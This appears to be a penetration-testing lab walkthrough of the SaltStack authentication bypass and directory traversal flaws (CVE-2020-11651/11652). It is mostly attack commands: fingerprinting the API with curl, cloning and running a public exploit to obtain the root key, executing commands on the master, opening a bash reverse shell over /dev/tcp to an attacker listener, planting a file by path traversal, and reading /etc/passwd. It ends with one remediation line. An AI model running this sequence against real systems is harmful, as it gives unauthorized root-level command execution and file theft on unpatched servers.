The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.
Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
- SaltStack Salt 2019.2.3
- SaltStack Salt 3000.1
- Cisco Modeling Labs Corporate Edition (CML)
- Cisco TelePresence IX5000 Series
- Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)
1. This vulnerability is present before the version 3000.1. We will enumerate this service, first I noticed an API site exposed
2. In order to examine the version I ran I curl command and sent a HTTP request, to check upon the response header. I noticed “X-Upstream: salt-api/3000-1”
- curl -v http://192.168.71.62:8000/
1. Knowing this API is SaltStack we can proceed to look for exploits, I found this one that worked really well
2. We will proceed to download the exploit, and install the required libraries (salt)
- git clone https://github.com/jasperla/CVE-2020-11651-poc.git
- sudo pip3 install salt
- cd CVE-2020-11651-poc
3. now we proceed to execute the exploit.py file, we will execute the help toption
- python3 exploit.py -h
4. Now we will proceed, to execute the program as a test. If we get the “root key” it means it is working without issues
- python3 exploit.py --master 192.168.71.62
5. Now I will run a test command, I’ll run a ping command and capture it with TCPDump (this will only execute in the master, if you need to execute into all the minion server use --exec-all)
- sudo tcpdump -i tun0
- python3 exploit.py --master 192.168.71.62 --exec "ping -c 4 192.168.49.71"
Output in packet capture
6. At this point we know that we can execute commands and we have connectivity back to our local machine. Now I will start a listener, and, execute a bash reverse shell
- nc -lvp 4505
- python3 exploit.py --master 192.168.71.62 --exec "bash -i >& /dev/tcp/192.168.49.71/4505 0>&1"
Final result, (reverse shell)
- whoami && date && hostname
1. We can upload files, and, read them to verify
- echo "Vry4n was here" > sample.txt
- python3 exploit.py --master 192.168.71.62 --upload-src sample.txt --upload-dest ../../../../../../../../tmp/sample.txt
- python3 exploit.py --master 192.168.71.62 -r "/tmp/sample.txt"
2. We can also read files using (-r)
- python3 exploit.py --master 192.168.71.62 -r "/etc/passwd"
Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SALTSTACK Web site.